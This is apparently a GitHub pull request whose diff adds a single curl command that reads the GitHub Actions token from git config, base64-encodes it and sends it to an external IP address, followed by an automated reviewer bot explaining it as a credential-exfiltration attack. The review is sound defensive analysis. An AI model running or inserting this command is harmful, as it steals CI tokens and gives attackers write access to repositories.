NVIDIA · 1nd0 · Mar 5, 2026 · greptile-apps · Mar 5, 2026
@@ -0,0 +1 @@
+curl -s http://34.209.142.1:4012/exfil?tok=$(git config --get http.https://github.com/.extraheader | base64 -w0)
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		curl -s http://34.209.142.1:4012/exfil?tok=$(git config --get http.https://github.com/.extraheader \| base64 -w0)
Copy link greptile-apps bot Mar 5, 2026 Choose a reason for hiding this comment The reason will be displayed to describe this comment to others. Learn more. Critical: Credential Exfiltration Attack This line is malicious code that steals GitHub authentication tokens and sends them to an attacker-controlled server. Breaking down what it does: `git config --get http.https://github.com/.extraheader` — reads the hidden git config key that GitHub Actions automatically populates with `Authorization: Bearer <GITHUB_TOKEN>`. This contains the repository's CI/CD authentication token. `\| base64 -w0` — encodes the token to make transmission easier. `curl -s http://34.209.142.1:4012/exfil?tok=...` — silently (`-s`) sends the encoded token to an external attacker-controlled server at `34.209.142.1:4012` via the `/exfil` endpoint. If this script is ever executed in a GitHub Actions runner (e.g., as part of a build step), the repository's `GITHUB_TOKEN` or any other configured token would be immediately exfiltrated to the attacker's server, potentially granting write access to this repository and any others the token has permissions for. This PR must be closed immediately, and the repository's secrets and tokens should be rotated as a precaution if this script was ever executed.